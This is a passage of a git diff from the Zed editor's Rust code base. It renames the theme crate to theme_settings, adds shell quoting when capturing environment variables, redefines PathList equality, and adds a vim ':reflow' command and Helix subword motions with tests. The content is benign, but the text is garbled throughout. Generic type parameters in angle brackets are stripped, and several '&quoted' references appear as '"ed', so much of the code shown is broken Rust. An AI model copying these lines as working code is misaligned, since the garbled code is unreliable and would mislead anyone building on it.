::theme::theme_settings(cx).ui_font_size(cx).into(); px(ui_font_size_f32 * self.spacing_ratio(cx)) } } diff --git a/crates/ui_prompt/Cargo.toml b/crates/ui_prompt/Cargo.toml index 55a98288433a7b31507310e20c4209a9d419e45f..9bcce107f3f7d6bd95ebddf6d33c4a9a29ec4493 100644 --- a/crates/ui_prompt/Cargo.toml +++ b/crates/ui_prompt/Cargo.toml @@ -19,6 +19,6 @@ gpui.workspace = true markdown.workspace = true menu.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true workspace.workspace = true diff --git a/crates/ui_prompt/src/ui_prompt.rs b/crates/ui_prompt/src/ui_prompt.rs index 3b2716fd92ea7889668767d66e47e5c43792f39e..92b1c9e74dcd2f7e227f5c325ea5defb0d9c8ed3 100644 --- a/crates/ui_prompt/src/ui_prompt.rs +++ b/crates/ui_prompt/src/ui_prompt.rs @@ -5,7 +5,7 @@ use gpui::{ }; use markdown::{Markdown, MarkdownElement, MarkdownStyle}; use settings::{Settings, SettingsStore}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{FluentBuilder, TintColor, prelude::*}; use workspace::WorkspaceSettings; diff --git a/crates/util/Cargo.toml b/crates/util/Cargo.toml index 6a9b30d463af2d9407e8f4c9e3a81133a87c1bce..4f317e79e0cfc92087250182531ae33a591b1f48 100644 --- a/crates/util/Cargo.toml +++ b/crates/util/Cargo.toml @@ -21,7 +21,7 @@ test-support = ["git2", "rand", "util_macros"] anyhow.workspace = true async_zip.workspace = true collections.workspace = true -dunce = "1.0" +dunce.workspace = true futures-lite.workspace = true futures.workspace = true globset.workspace = true @@ -64,7 +64,6 @@ tendril = "0.4.3" [dev-dependencies] git2.workspace = true -indoc.workspace = true rand.workspace = true util_macros.workspace = true pretty_assertions.workspace = true diff --git a/crates/util/src/command.rs b/crates/util/src/command.rs index 44db592640bc70362b924ffca674fd02a4126f3a..a131d3c15b9fed351cc1d3a86bad7771b7d53167 100644 --- a/crates/util/src/command.rs +++ b/crates/util/src/command.rs @@ -68,6 +68,10 @@ impl Command { self } + pub fn get_args(&self) -> impl Iterator { + self.0.get_args() + } + pub fn env(&mut self, key: impl AsRef, val: impl AsRef) -> &mut Self { self.0.env(key, val); self @@ -129,4 +133,8 @@ impl Command { pub async fn status(&mut self) -> std::io::Result { self.0.status().await } + + pub fn get_program(&self) -> &OsStr { + self.0.get_program() + } } diff --git a/crates/util/src/command/darwin.rs b/crates/util/src/command/darwin.rs index 347fc8180ed9325d4f36a3fcce2f3c68964321d5..a3d7561f4e3cfde1f6ff33cdc469af071044fa0b 100644 --- a/crates/util/src/command/darwin.rs +++ b/crates/util/src/command/darwin.rs @@ -104,6 +104,10 @@ impl Command { self } + pub fn get_args(&self) -> impl Iterator { + self.args.iter().map(|s| s.as_os_str()) + } + pub fn env(&mut self, key: impl AsRef, val: impl AsRef) -> &mut Self { self.envs .insert(key.as_ref().to_owned(), Some(val.as_ref().to_owned())); @@ -217,6 +221,10 @@ impl Command { let mut child = self.spawn()?; child.status().await } + + pub fn get_program(&self) -> &OsStr { + self.program.as_os_str() + } } #[derive(Debug)] diff --git a/crates/util/src/path_list.rs b/crates/util/src/path_list.rs index 1f923769780de2ae7f1dc18d3334020960ff3bb6..af99f4c6570b35b004179afb87b737d3a4356489 100644 --- a/crates/util/src/path_list.rs +++ b/crates/util/src/path_list.rs @@ -1,19 +1,20 @@ use std::{ + hash::{Hash, Hasher}, path::{Path, PathBuf}, sync::Arc, }; use crate::paths::SanitizedPath; use itertools::Itertools; -use serde::{Deserialize, Deserializer, Serialize, Serializer}; +use serde::{Deserialize, Serialize}; -/// A list of absolute paths, in a specific order. +/// A list of absolute paths, with an associated display order. /// -/// The paths are stored in lexicographic order, so that they can be compared to -/// other path lists without regard to the order of the paths. +/// Two `PathList` values are considered equal if they contain the same paths, +/// regardless of the order in which those paths were originally provided. /// /// The paths can be retrieved in the original order using `ordered_paths()`. -#[derive(Default, PartialEq, Eq, Debug, Clone)] +#[derive(Default, Debug, Clone)] pub struct PathList { /// The paths, in lexicographic order. paths: Arc<[PathBuf]>, @@ -23,7 +24,21 @@ pub struct PathList { order: Arc<[usize]>, } -#[derive(Debug)] +impl PartialEq for PathList { + fn eq(&self, other: &Self) -> bool { + self.paths == other.paths + } +} + +impl Eq for PathList {} + +impl Hash for PathList { + fn hash(&self, state: &mut H) { + self.paths.hash(state); + } +} + +#[derive(Debug, Clone, Serialize, Deserialize)] pub struct SerializedPathList { pub paths: String, pub order: String, @@ -50,11 +65,26 @@ impl PathList { self.paths.is_empty() } + /// Returns a new `PathList` with the given path removed. + pub fn without_path(&self, path_to_remove: &Path) -> PathList { + let paths: Vec = self + .ordered_paths() + .filter(|p| p.as_path() != path_to_remove) + .cloned() + .collect(); + PathList::new(&paths) + } + /// Get the paths in lexicographic order. pub fn paths(&self) -> &[PathBuf] { self.paths.as_ref() } + /// Get the paths in the lexicographic order. + pub fn paths_owned(&self) -> Arc<[PathBuf]> { + self.paths.clone() + } + /// Get the order in which the paths were provided. pub fn order(&self) -> &[usize] { self.order.as_ref() @@ -119,19 +149,6 @@ impl PathList { } } -impl Serialize for PathList { - fn serialize(&self, serializer: S) -> Result { - self.paths.serialize(serializer) - } -} - -impl<'de> Deserialize<'de> for PathList { - fn deserialize>(deserializer: D) -> Result { - let paths: Vec = Vec::deserialize(deserializer)?; - Ok(PathList::new(&paths)) - } -} - #[cfg(test)] mod tests { use super::*; @@ -145,6 +162,12 @@ mod tests { assert_eq!(list1.order(), &[1, 0], "list1 order incorrect"); assert_eq!(list2.order(), &[0, 1], "list2 order incorrect"); + // Same paths in different order are equal (order is display-only). + assert_eq!( + list1, list2, + "same paths with different order should be equal" + ); + let list1_deserialized = PathList::deserialize(&list1.serialize()); assert_eq!(list1_deserialized, list1, "list1 deserialization failed"); diff --git a/crates/util/src/paths.rs b/crates/util/src/paths.rs index 39b4064a1bd9d3c4c240abf9665b17151066e9ef..3ff07c67a8d2def75e4e7f756c4a466ea2b68ed0 100644 --- a/crates/util/src/paths.rs +++ b/crates/util/src/paths.rs @@ -601,6 +601,7 @@ const ROW_COL_CAPTURE_REGEX: &str = r"(?xs) | \((\d+)\)() # filename(row) ) + \:*$ | (.+?)(?: \:+(\d+)\:(\d+)\:*$ # filename:row:column @@ -2097,6 +2098,15 @@ mod tests { column: Some(9), } ); + + assert_eq!( + PathWithPosition::parse_str("main (1).log"), + PathWithPosition { + path: PathBuf::from("main (1).log"), + row: None, + column: None + } + ); } #[perf] @@ -2175,6 +2185,15 @@ mod tests { column: None } ); + + assert_eq!( + PathWithPosition::parse_str("C:\\Users\\someone\\main (1).log"), + PathWithPosition { + path: PathBuf::from("C:\\Users\\someone\\main (1).log"), + row: None, + column: None + } + ); } #[perf] diff --git a/crates/util/src/shell.rs b/crates/util/src/shell.rs index 27ab18b58ce14cc59d57e563103fc9135f93d060..87872856d916ae39809debaeb6c151705367246b 100644 --- a/crates/util/src/shell.rs +++ b/crates/util/src/shell.rs @@ -1012,4 +1012,40 @@ mod tests { "uname".to_string() ); } + + #[test] + fn test_try_quote_single_quote_paths() { + let path_with_quote = r"C:\Temp\O'Brien\repo"; + let shlex_shells = [ + ShellKind::Posix, + ShellKind::Fish, + ShellKind::Csh, + ShellKind::Tcsh, + ShellKind::Rc, + ShellKind::Xonsh, + ShellKind::Elvish, + ShellKind::Nushell, + ]; + + for shell_kind in shlex_shells { + let quoted = shell_kind.try_quote(path_with_quote).unwrap().into_owned(); + assert_ne!(quoted, path_with_quote); + assert_eq!( + shlex::split("ed), + Some(vec![path_with_quote.to_string()]) + ); + + if shell_kind == ShellKind::Nushell { + let prefixed = shell_kind.prepend_command_prefix("ed); + assert!(prefixed.starts_with('^')); + } + } + + for shell_kind in [ShellKind::PowerShell, ShellKind::Pwsh] { + let quoted = shell_kind.try_quote(path_with_quote).unwrap().into_owned(); + assert!(quoted.starts_with('\'')); + assert!(quoted.ends_with('\'')); + assert!(quoted.contains("O''Brien")); + } + } } diff --git a/crates/util/src/shell_env.rs b/crates/util/src/shell_env.rs index 4fc9fd2d69b608c1215495d84c340f11e5be8179..72c563abe52336c2b5ccc511746834a9a0384aeb 100644 --- a/crates/util/src/shell_env.rs +++ b/crates/util/src/shell_env.rs @@ -2,9 +2,21 @@ use std::path::Path; use anyhow::{Context as _, Result}; use collections::HashMap; +use serde::Deserialize; use crate::shell::ShellKind; +fn parse_env_map_from_noisy_output(output: &str) -> Result> { + for (position, _) in output.match_indices('{') { + let candidate = &output[position..]; + let mut deserializer = serde_json::Deserializer::from_str(candidate); + if let Ok(env_map) = HashMap::::deserialize(&mut deserializer) { + return Ok(env_map); + } + } + anyhow::bail!("Failed to find JSON in shell output: {output}") +} + pub fn print_env() { let env_vars: HashMap = std::env::vars().collect(); let json = serde_json::to_string_pretty(&env_vars).unwrap_or_else(|err| { @@ -73,13 +85,27 @@ async fn capture_unix( command.arg("-l"); } } + + match shell_kind { + // Nushell does not allow non-interactive login shells. + // Instead of doing "-l -i -c ''" + // use "-l -e '; exit'" instead + ShellKind::Nushell => command.arg("-e"), + _ => command.args(["-i", "-c"]), + }; + // cd into the directory, triggering directory specific side-effects (asdf, direnv, etc) command_string.push_str(&format!("cd '{}';", directory.display())); if let Some(prefix) = shell_kind.command_prefix() { command_string.push(prefix); } command_string.push_str(&format!("{} --printenv {}", zed_path, redir)); - command.args(["-i", "-c", &command_string]); + + if let ShellKind::Nushell = shell_kind { + command_string.push_str("; exit"); + } + + command.arg(&command_string); super::set_pre_exec_to_start_new_session(&mut command); @@ -95,10 +121,9 @@ async fn capture_unix( ); // Parse the JSON output from zed --printenv - let env_map: collections::HashMap = serde_json::from_str(&env_output) - .with_context(|| { - format!("Failed to deserialize environment variables from json: {env_output}") - })?; + let env_map = parse_env_map_from_noisy_output(&env_output).with_context(|| { + format!("Failed to deserialize environment variables from json: {env_output}") + })?; Ok(env_map) } @@ -141,6 +166,14 @@ async fn capture_windows( std::env::current_exe().context("Failed to determine current zed executable path.")?; let shell_kind = ShellKind::new(shell_path, true); + let directory_string = directory.display().to_string(); + let zed_path_string = zed_path.display().to_string(); + let quote_for_shell = |value: &str| { + shell_kind + .try_quote(value) + .map(|quoted| quoted.into_owned()) + .unwrap_or_else(|| value.to_owned()) + }; let mut cmd = crate::command::new_command(shell_path); cmd.args(args); let cmd = match shell_kind { @@ -149,54 +182,52 @@ async fn capture_windows( | ShellKind::Rc | ShellKind::Fish | ShellKind::Xonsh - | ShellKind::Posix => cmd.args([ - "-l", - "-i", - "-c", - &format!( - "cd '{}'; '{}' --printenv", - directory.display(), - zed_path.display() - ), - ]), - ShellKind::PowerShell | ShellKind::Pwsh => cmd.args([ - "-NonInteractive", - "-NoProfile", - "-Command", - &format!( - "Set-Location '{}'; & '{}' --printenv", - directory.display(), - zed_path.display() - ), - ]), - ShellKind::Elvish => cmd.args([ - "-c", - &format!( - "cd '{}'; '{}' --printenv", - directory.display(), - zed_path.display() - ), - ]), - ShellKind::Nushell => cmd.args([ - "-c", - &format!( - "cd '{}'; {}'{}' --printenv", - directory.display(), - shell_kind - .command_prefix() - .map(|prefix| prefix.to_string()) - .unwrap_or_default(), - zed_path.display() - ), - ]), - ShellKind::Cmd => cmd.args([ - "/c", - "cd", - &directory.display().to_string(), - "&&", - &zed_path.display().to_string(), - "--printenv", - ]), + | ShellKind::Posix => { + let quoted_directory = quote_for_shell(&directory_string); + let quoted_zed_path = quote_for_shell(&zed_path_string); + cmd.args([ + "-l", + "-i", + "-c", + &format!("cd {}; {} --printenv", quoted_directory, quoted_zed_path), + ]) + } + ShellKind::PowerShell | ShellKind::Pwsh => { + let quoted_directory = ShellKind::quote_pwsh(&directory_string); + let quoted_zed_path = ShellKind::quote_pwsh(&zed_path_string); + cmd.args([ + "-NonInteractive", + "-NoProfile", + "-Command", + &format!( + "Set-Location {}; & {} --printenv", + quoted_directory, quoted_zed_path + ), + ]) + } + ShellKind::Elvish => { + let quoted_directory = quote_for_shell(&directory_string); + let quoted_zed_path = quote_for_shell(&zed_path_string); + cmd.args([ + "-c", + &format!("cd {}; {} --printenv", quoted_directory, quoted_zed_path), + ]) + } + ShellKind::Nushell => { + let quoted_directory = quote_for_shell(&directory_string); + let quoted_zed_path = quote_for_shell(&zed_path_string); + let zed_command = shell_kind + .prepend_command_prefix("ed_zed_path) + .into_owned(); + cmd.args([ + "-c", + &format!("cd {}; {} --printenv", quoted_directory, zed_command), + ]) + } + ShellKind::Cmd => { + let dir = directory_string.trim_end_matches('\\'); + cmd.args(["/d", "/c", "cd", dir, "&&", &zed_path_string, "--printenv"]) + } } .stdin(Stdio::null()) .stdout(Stdio::piped()) @@ -214,8 +245,7 @@ async fn capture_windows( ); let env_output = String::from_utf8_lossy(&output.stdout); - // Parse the JSON output from zed --printenv - serde_json::from_str(&env_output).with_context(|| { + parse_env_map_from_noisy_output(&env_output).with_context(|| { format!("Failed to deserialize environment variables from json: {env_output}") }) } diff --git a/crates/util/src/util.rs b/crates/util/src/util.rs index 4f129ef6d529aff0991b86882e5e60b6ad837d5c..bd8ab4e2d4d99864c5e0dc228410904f3338d7c6 100644 --- a/crates/util/src/util.rs +++ b/crates/util/src/util.rs @@ -686,28 +686,6 @@ impl PartialOrd for NumericPrefixWithSuffix<'_> { } } -/// Capitalizes the first character of a string. -/// -/// This function takes a string slice as input and returns a new `String` with the first character -/// capitalized. -/// -/// # Examples -/// -/// ``` -/// use util::capitalize; -/// -/// assert_eq!(capitalize("hello"), "Hello"); -/// assert_eq!(capitalize("WORLD"), "WORLD"); -/// assert_eq!(capitalize(""), ""); -/// ``` -pub fn capitalize(str: &str) -> String { - let mut chars = str.chars(); - match chars.next() { - None => String::new(), - Some(first_char) => first_char.to_uppercase().collect::() + chars.as_str(), - } -} - fn emoji_regex() -> &'static Regex { static EMOJI_REGEX: LazyLock = LazyLock::new(|| Regex::new("(\\p{Emoji}|\u{200D})").unwrap()); diff --git a/crates/vim/Cargo.toml b/crates/vim/Cargo.toml index 38bf9fed621aa3aa378cbcaa3479f7ecd7b60e11..64282953a33312b85cc1e7cf21076b0cb61dccab 100644 --- a/crates/vim/Cargo.toml +++ b/crates/vim/Cargo.toml @@ -44,6 +44,7 @@ settings.workspace = true task.workspace = true text.workspace = true theme.workspace = true +theme_settings.workspace = true menu.workspace = true tokio = { version = "1.15", features = ["full"], optional = true } ui.workspace = true @@ -54,11 +55,9 @@ workspace.workspace = true zed_actions.workspace = true [dev-dependencies] -assets.workspace = true command_palette = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } git_ui = { workspace = true, features = ["test-support"] } -title_bar = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } indoc.workspace = true language = { workspace = true, features = ["test-support"] } diff --git a/crates/vim/src/command.rs b/crates/vim/src/command.rs index 0eebcd9532a82fd999519c6c33a1c8df3bb16667..fd19a5dc400a24b9f27617c44bd71fe38073c757 100644 --- a/crates/vim/src/command.rs +++ b/crates/vim/src/command.rs @@ -28,7 +28,7 @@ use std::{ sync::OnceLock, time::Instant, }; -use task::{HideStrategy, RevealStrategy, SpawnInTerminal, TaskId}; +use task::{HideStrategy, RevealStrategy, SaveStrategy, SpawnInTerminal, TaskId}; use ui::ActiveTheme; use util::{ ResultExt, @@ -47,6 +47,7 @@ use crate::{ search::{FindCommand, ReplaceCommand, Replacement}, }, object::Object, + rewrap::Rewrap, state::{Mark, Mode}, visual::VisualDeleteLine, }; @@ -1347,7 +1348,7 @@ impl Position { let snapshot = editor.snapshot(window, cx); let target = match self { Position::Line { row, offset } => { - if let Some(anchor) = editor.active_excerpt(cx).and_then(|(_, buffer, _)| { + if let Some(anchor) = editor.active_buffer(cx).and_then(|buffer| { editor.buffer().read(cx).buffer_point_to_anchor( &buffer, Point::new(row.saturating_sub(1), 0), @@ -1659,9 +1660,13 @@ fn generate_commands(_: &App) -> Vec { action.range.replace(range.clone()); Some(Box::new(action)) }), - VimCommand::new(("bn", "ext"), workspace::ActivateNextItem).count(), - VimCommand::new(("bN", "ext"), workspace::ActivatePreviousItem).count(), - VimCommand::new(("bp", "revious"), workspace::ActivatePreviousItem).count(), + VimCommand::new(("bn", "ext"), workspace::ActivateNextItem::default()).count(), + VimCommand::new(("bN", "ext"), workspace::ActivatePreviousItem::default()).count(), + VimCommand::new( + ("bp", "revious"), + workspace::ActivatePreviousItem::default(), + ) + .count(), VimCommand::new(("bf", "irst"), workspace::ActivateItem(0)), VimCommand::new(("br", "ewind"), workspace::ActivateItem(0)), VimCommand::new(("bl", "ast"), workspace::ActivateLastItem), @@ -1669,9 +1674,13 @@ fn generate_commands(_: &App) -> Vec { VimCommand::str(("ls", ""), "tab_switcher::ToggleAll"), VimCommand::new(("new", ""), workspace::NewFileSplitHorizontal), VimCommand::new(("vne", "w"), workspace::NewFileSplitVertical), - VimCommand::new(("tabn", "ext"), workspace::ActivateNextItem).count(), - VimCommand::new(("tabp", "revious"), workspace::ActivatePreviousItem).count(), - VimCommand::new(("tabN", "ext"), workspace::ActivatePreviousItem).count(), + VimCommand::new(("tabn", "ext"), workspace::ActivateNextItem::default()).count(), + VimCommand::new( + ("tabp", "revious"), + workspace::ActivatePreviousItem::default(), + ) + .count(), + VimCommand::new(("tabN", "ext"), workspace::ActivatePreviousItem::default()).count(), VimCommand::new( ("tabc", "lose"), workspace::CloseActiveItem { @@ -1725,6 +1734,15 @@ fn generate_commands(_: &App) -> Vec { ) .range(wrap_count), VimCommand::new(("j", "oin"), JoinLines).range(select_range), + VimCommand::new(("reflow", ""), Rewrap { line_length: None }) + .range(select_range) + .args(|_action, args| { + args.parse::().map_or(None, |length| { + Some(Box::new(Rewrap { + line_length: Some(length), + })) + }) + }), VimCommand::new(("fo", "ld"), editor::actions::FoldSelectedRanges).range(act_on_range), VimCommand::new(("foldo", "pen"), editor::actions::UnfoldLines) .bang(editor::actions::UnfoldRecursive) @@ -2318,7 +2336,7 @@ impl Vim { match c { '%' => { self.update_editor(cx, |_, editor, cx| { - if let Some((_, buffer, _)) = editor.active_excerpt(cx) + if let Some(buffer) = editor.active_buffer(cx) && let Some(file) = buffer.read(cx).file() && let Some(local) = file.as_local() { @@ -2479,6 +2497,7 @@ impl ShellExec { show_summary: false, show_command: false, show_rerun: false, + save: SaveStrategy::default(), }; let task_status = workspace.spawn_in_terminal(spawn_in_terminal, window, cx); @@ -3536,4 +3555,88 @@ mod test { Mode::Normal, ); } + + #[gpui::test] + async fn test_reflow(cx: &mut TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + + cx.update_editor(|editor, _window, cx| { + editor.set_hard_wrap(Some(10), cx); + }); + + cx.set_state( + indoc! {" + ˇ0123456789 0123456789 + "}, + Mode::Normal, + ); + + cx.simulate_keystrokes(": reflow"); + cx.simulate_keystrokes("enter"); + + cx.assert_state( + indoc! {" + 0123456789 + ˇ0123456789 + "}, + Mode::Normal, + ); + + cx.set_state( + indoc! {" + ˇ0123456789 0123456789 + "}, + Mode::VisualLine, + ); + + cx.simulate_keystrokes("shift-v : reflow"); + cx.simulate_keystrokes("enter"); + + cx.assert_state( + indoc! {" + 0123456789 + ˇ0123456789 + "}, + Mode::Normal, + ); + + cx.set_state( + indoc! {" + ˇ0123 4567 0123 4567 + "}, + Mode::VisualLine, + ); + + cx.simulate_keystrokes(": reflow space 7"); + cx.simulate_keystrokes("enter"); + + cx.assert_state( + indoc! {" + ˇ0123 + 4567 + 0123 + 4567 + "}, + Mode::Normal, + ); + + // Assert that, if `:reflow` is invoked with an invalid argument, it + // does not actually have any effect in the buffer's contents. + cx.set_state( + indoc! {" + ˇ0123 4567 0123 4567 + "}, + Mode::VisualLine, + ); + + cx.simulate_keystrokes(": reflow space a"); + cx.simulate_keystrokes("enter"); + + cx.assert_state( + indoc! {" + ˇ0123 4567 0123 4567 + "}, + Mode::VisualLine, + ); + } } diff --git a/crates/vim/src/helix.rs b/crates/vim/src/helix.rs index 126683f0b419ae9a44d17d90d760f06b106fad8a..923bd8c6a057819129b29b86e559c79a30f011f9 100644 --- a/crates/vim/src/helix.rs +++ b/crates/vim/src/helix.rs @@ -36,6 +36,8 @@ actions!( HelixInsert, /// Appends at the end of the selection. HelixAppend, + /// Inserts at the end of the current Helix cursor line. + HelixInsertEndOfLine, /// Goes to the location of the last modification. HelixGotoLastModification, /// Select entire line or multiple lines, extending downwards. @@ -64,6 +66,7 @@ pub fn register(editor: &mut Editor, cx: &mut Context) { Vim::action(editor, cx, Vim::helix_select_lines); Vim::action(editor, cx, Vim::helix_insert); Vim::action(editor, cx, Vim::helix_append); + Vim::action(editor, cx, Vim::helix_insert_end_of_line); Vim::action(editor, cx, Vim::helix_yank); Vim::action(editor, cx, Vim::helix_goto_last_modification); Vim::action(editor, cx, Vim::helix_paste); @@ -363,6 +366,56 @@ impl Vim { } } + /// When `reversed` is true (used with `helix_find_range_backward`), the + /// `left` and `right` characters are yielded in reverse text order, so the + /// camelCase transition check must be flipped accordingly. + fn subword_boundary_start( + ignore_punctuation: bool, + reversed: bool, + ) -> impl FnMut(char, char, &CharClassifier) -> bool { + move |left, right, classifier| { + let left_kind = classifier.kind_with(left, ignore_punctuation); + let right_kind = classifier.kind_with(right, ignore_punctuation); + let at_newline = (left == '\n') ^ (right == '\n'); + let is_separator = |c: char| "_$=".contains(c); + + let is_word = left_kind != right_kind && right_kind != CharKind::Whitespace; + let is_subword = (is_separator(left) && !is_separator(right)) + || if reversed { + right.is_lowercase() && left.is_uppercase() + } else { + left.is_lowercase() && right.is_uppercase() + }; + + is_word || (is_subword && !right.is_whitespace()) || at_newline + } + } + + /// When `reversed` is true (used with `helix_find_range_backward`), the + /// `left` and `right` characters are yielded in reverse text order, so the + /// camelCase transition check must be flipped accordingly. + fn subword_boundary_end( + ignore_punctuation: bool, + reversed: bool, + ) -> impl FnMut(char, char, &CharClassifier) -> bool { + move |left, right, classifier| { + let left_kind = classifier.kind_with(left, ignore_punctuation); + let right_kind = classifier.kind_with(right, ignore_punctuation); + let at_newline = (left == '\n') ^ (right == '\n'); + let is_separator = |c: char| "_$=".contains(c); + + let is_word = left_kind != right_kind && left_kind != CharKind::Whitespace; + let is_subword = (!is_separator(left) && is_separator(right)) + || if reversed { + right.is_lowercase() && left.is_uppercase() + } else { + left.is_lowercase() && right.is_uppercase() + }; + + is_word || (is_subword && !left.is_whitespace()) || at_newline + } + } + pub fn helix_move_cursor( &mut self, motion: Motion, @@ -387,6 +440,29 @@ impl Vim { let mut is_boundary = Self::is_boundary_right(ignore_punctuation); self.helix_find_range_backward(times, window, cx, &mut is_boundary) } + // The subword motions implementation is based off of the same + // commands present in Helix itself, namely: + // + // * `move_next_sub_word_start` + // * `move_next_sub_word_end` + // * `move_prev_sub_word_start` + // * `move_prev_sub_word_end` + Motion::NextSubwordStart { ignore_punctuation } => { + let mut is_boundary = Self::subword_boundary_start(ignore_punctuation, false); + self.helix_find_range_forward(times, window, cx, &mut is_boundary) + } + Motion::NextSubwordEnd { ignore_punctuation } => { + let mut is_boundary = Self::subword_boundary_end(ignore_punctuation, false); + self.helix_find_range_forward(times, window, cx, &mut is_boundary) + } + Motion::PreviousSubwordStart { ignore_punctuation } => { + let mut is_boundary = Self::subword_boundary_end(ignore_punctuation, true); + self.helix_find_range_backward(times, window, cx, &mut is_boundary) + } + Motion::PreviousSubwordEnd { ignore_punctuation } => { + let mut is_boundary = Self::subword_boundary_start(ignore_punctuation, true); + self.helix_find_range_backward(times, window, cx, &mut is_boundary) + } Motion::EndOfLine { .. } => { // In Helix mode, EndOfLine should position cursor ON the last character, // not after it. We therefore need special handling for it. @@ -571,6 +647,7 @@ impl Vim { self.search = SearchState { direction: searchable::Direction::Next, count: 1, + cmd_f_search: false, prior_selections, prior_operator: self.operator_stack.last().cloned(), prior_mode: self.mode, @@ -600,44 +677,62 @@ impl Vim { }); } + /// Helix-specific implementation of `shift-a` that accounts for Helix's + /// selection model, where selecting a line with `x` creates a selection + /// from column 0 of the current row to column 0 of the next row, so the + /// default [`vim::normal::InsertEndOfLine`] would move the cursor to the + /// end of the wrong line. + fn helix_insert_end_of_line( + &mut self, + _: &HelixInsertEndOfLine, + window: &mut Window, + cx: &mut Context, + ) { + self.start_recording(cx); + self.switch_mode(Mode::Insert, false, window, cx); + self.update_editor(cx, |_, editor, cx| { + editor.change_selections(Default::default(), window, cx, |s| { + s.move_with(&mut |map, selection| { + let cursor = if !selection.is_empty() && !selection.reversed { + movement::left(map, selection.head()) + } else { + selection.head() + }; + selection + .collapse_to(motion::next_line_end(map, cursor, 1), SelectionGoal::None); + }); + }); + }); + } + pub fn helix_replace(&mut self, text: &str, window: &mut Window, cx: &mut Context) { self.update_editor(cx, |_, editor, cx| { editor.transact(window, cx, |editor, window, cx| { let display_map = editor.display_snapshot(cx); let selections = editor.selections.all_display(&display_map); - // Store selection info for positioning after edit - let selection_info: Vec<_> = selections - .iter() - .map(|selection| { - let range = selection.range(); - let start_offset = range.start.to_offset(&display_map, Bias::Left); - let end_offset = range.end.to_offset(&display_map, Bias::Left); - let was_empty = range.is_empty(); - let was_reversed = selection.reversed; - ( - display_map.buffer_snapshot().anchor_before(start_offset), - end_offset - start_offset, - was_empty, - was_reversed, - ) - }) - .collect(); - let mut edits = Vec::new(); + let mut selection_info = Vec::new(); for selection in &selections { let mut range = selection.range(); + let was_empty = range.is_empty(); + let was_reversed = selection.reversed; - // For empty selections, extend to replace one character - if range.is_empty() { + if was_empty { range.end = movement::saturating_right(&display_map, range.start); } let byte_range = range.start.to_offset(&display_map, Bias::Left) ..range.end.to_offset(&display_map, Bias::Left); + let snapshot = display_map.buffer_snapshot(); + let grapheme_count = snapshot.grapheme_count_for_range(&byte_range); + let anchor = snapshot.anchor_before(byte_range.start); + + selection_info.push((anchor, grapheme_count, was_empty, was_reversed)); + if !byte_range.is_empty() { - let replacement_text = text.repeat(byte_range.end - byte_range.start); + let replacement_text = text.repeat(grapheme_count); edits.push((byte_range, replacement_text)); } } @@ -648,14 +743,12 @@ impl Vim { let snapshot = editor.buffer().read(cx).snapshot(cx); let ranges: Vec<_> = selection_info .into_iter() - .map(|(start_anchor, original_len, was_empty, was_reversed)| { + .map(|(start_anchor, grapheme_count, was_empty, was_reversed)| { let start_point = start_anchor.to_point(&snapshot); if was_empty { - // For cursor-only, collapse to start start_point..start_point } else { - // For selections, span the replaced text - let replacement_len = text.len() * original_len; + let replacement_len = text.len() * grapheme_count; let end_offset = start_anchor.to_offset(&snapshot) + replacement_len; let end_point = snapshot.offset_to_point(end_offset); if was_reversed { @@ -845,11 +938,18 @@ impl Vim { self.update_editor(cx, |_vim, editor, cx| { let snapshot = editor.snapshot(window, cx); editor.change_selections(SelectionEffects::default(), window, cx, |s| { - s.select_anchor_ranges( + let buffer = snapshot.buffer_snapshot(); + + s.select_ranges( prior_selections .iter() .cloned() - .chain(s.all_anchors(&snapshot).iter().map(|s| s.range())), + .chain(s.all_anchors(&snapshot).iter().map(|s| s.range())) + .map(|range| { + let start = range.start.to_offset(buffer); + let end = range.end.to_offset(buffer); + start..end + }), ); }) }); @@ -859,7 +959,7 @@ impl Vim { #[cfg(test)] mod test { - use gpui::{UpdateGlobal, VisualTestContext}; + use gpui::{KeyBinding, UpdateGlobal, VisualTestContext}; use indoc::indoc; use project::FakeFs; use search::{ProjectSearchView, project_search}; @@ -932,6 +1032,310 @@ mod test { cx.assert_state("aa\n«ˇ »bb", Mode::HelixNormal); } + #[gpui::test] + async fn test_next_subword_start(cx: &mut gpui::TestAppContext) { + let mut cx = VimTestContext::new(cx, true).await; + cx.enable_helix(); + + // Setup custom keybindings for subword motions so we can use the bindings + // in `simulate_keystroke`. + cx.update(|_window, cx| { + cx.bind_keys([KeyBinding::new( + "w", + crate::motion::NextSubwordStart { + ignore_punctuation: false, + }, + None, + )]); + }); + + cx.set_state("ˇfoo.bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«fooˇ».bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo«.ˇ»bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo.«barˇ»", Mode::HelixNormal); + + cx.set_state("ˇfoo(bar)", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«fooˇ»(bar)", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo«(ˇ»bar)", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo(«barˇ»)", Mode::HelixNormal); + + cx.set_state("ˇfoo_bar_baz", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«foo_ˇ»bar_baz", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo_«bar_ˇ»baz", Mode::HelixNormal); + + cx.set_state("ˇfooBarBaz", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«fooˇ»BarBaz", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo«Barˇ»Baz", Mode::HelixNormal); + + cx.set_state("ˇfoo;bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("«fooˇ»;bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo«;ˇ»bar", Mode::HelixNormal); + cx.simulate_keystroke("w"); + cx.assert_state("foo;«barˇ»", Mode::HelixNormal); + + cx.set_state("ˇ, ) { - self.duplicate_selections( - times, - window, - cx, - &|prev_point| *prev_point.row_mut() += 1, - &|prev_range, map| prev_range.end.row() >= map.max_point().row(), - false, - ); + self.duplicate_selections(times, window, cx, Direction::Below); } /// Creates a duplicate of every selection above it in the first place that has both its start @@ -34,14 